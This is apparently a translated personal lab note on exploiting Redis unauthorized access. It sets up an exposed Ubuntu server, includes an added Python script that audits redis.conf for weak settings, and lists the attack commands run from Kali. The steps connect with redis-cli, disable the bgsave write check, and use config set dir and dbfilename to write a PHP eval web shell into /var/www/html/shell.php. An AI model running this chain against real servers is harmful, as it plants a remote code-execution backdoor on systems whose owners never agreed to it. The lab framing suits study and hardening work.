Ways to exploit Redis unauthorized access (ubuntu
Installation
ubuntu
https://blog.csdn.net/hzlarm/article/details/99432240
sudo apt-get install redis-server
sudo vi /etc/redis/redis.conf
#bind 127.0.0.1
protected-mode no
Restart: sudo service redis restart
kali
https://www.cnblogs.com/littlemood/p/11795761.html
kali attacking ubuntu
Unauthorized access vulnerability
https://www.cnblogs.com/ECJTUACM-873284962/p/9561993.html
https://www.cnblogs.com/yuzly/p/11663822.html
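Conditions required:
(1) Redis is bound to 0.0.0.0:6379 and no security policy, such as firewall rules that block access from untrusted source IPs, has been put in place, so it is exposed directly to the public network;
(2) No password authentication is set (the password is usually empty), so the Redis service can be logged into remotely without a password.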
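To check a server for the two conditions above, the following Python script audits the text of a redis.conf. It is an added example, not part of the original notes; the sample configurations are constructed and the function names are this example's own.

```python
# Added example: audit redis.conf text for the exposure conditions listed above.
SAMPLE_WEAK = """\
# constructed sample mirroring the lab setup on this page
#bind 127.0.0.1
protected-mode no
port 6379
"""

SAMPLE_HARDENED = """\
# constructed sample of a corrected configuration
bind 127.0.0.1
protected-mode yes
requirepass "constructed-placeholder-password"
port 6379
"""

LOOPBACK = {"127.0.0.1", "::1", "-::1", "localhost"}


def parse_conf(text):
    """Return {directive: [argument lists]}, ignoring comments and blank lines."""
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        conf.setdefault(parts[0].lower(), []).append(parts[1:])
    return conf


def audit(text):
    """Return a list of findings; an empty list means neither condition holds."""
    conf = parse_conf(text)
    findings = []
    binds = [a for args in conf.get("bind", []) for a in args]
    # With no active bind line, Redis listens on all interfaces.
    if not binds or any(a not in LOOPBACK for a in binds):
        findings.append("bind: reachable on non-loopback interfaces")
    # protected-mode defaults to yes when the directive is absent.
    mode = conf.get("protected-mode", [["yes"]])[-1]
    if mode and mode[0].lower() == "no":
        findings.append("protected-mode: disabled")
    password = conf.get("requirepass", [[]])[-1]
    if not password or password[0].strip("\"'") == "":
        findings.append("requirepass: no password set")
    return findings
```

Calling audit(open("/etc/redis/redis.conf").read()) on the server prints nothing by itself; an empty returned list means none of the three checks fired.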
ubuntu: 192.168.79.129
kali: 192.168.79.128
-
Use redis-cli to connect to the Redis server; because of the Redis unauthorized access, the connection to the Redis server is made directly
kali
redis-cli -h 192.168.79.129
The connection succeeds
Use the config get dir command to get the Redis backup path
(error) MISCONF Redis is configured to save RDB snapshots, but it is currently not able to persist on disk. Commands that may modify the data set are disabled, because this instance is configured to report errors during writes if RDB snapshotting fails (stop-writes-on-bgsave-error option). Please check the Redis logs for details about the RDB error. (5.12s)
config set stop-writes-on-bgsave-error no
save keeps failing...
set 1 '<?php eval($_GET["a"]);?>'
config set dir /var/www/html
config set dbfilename shell.php
save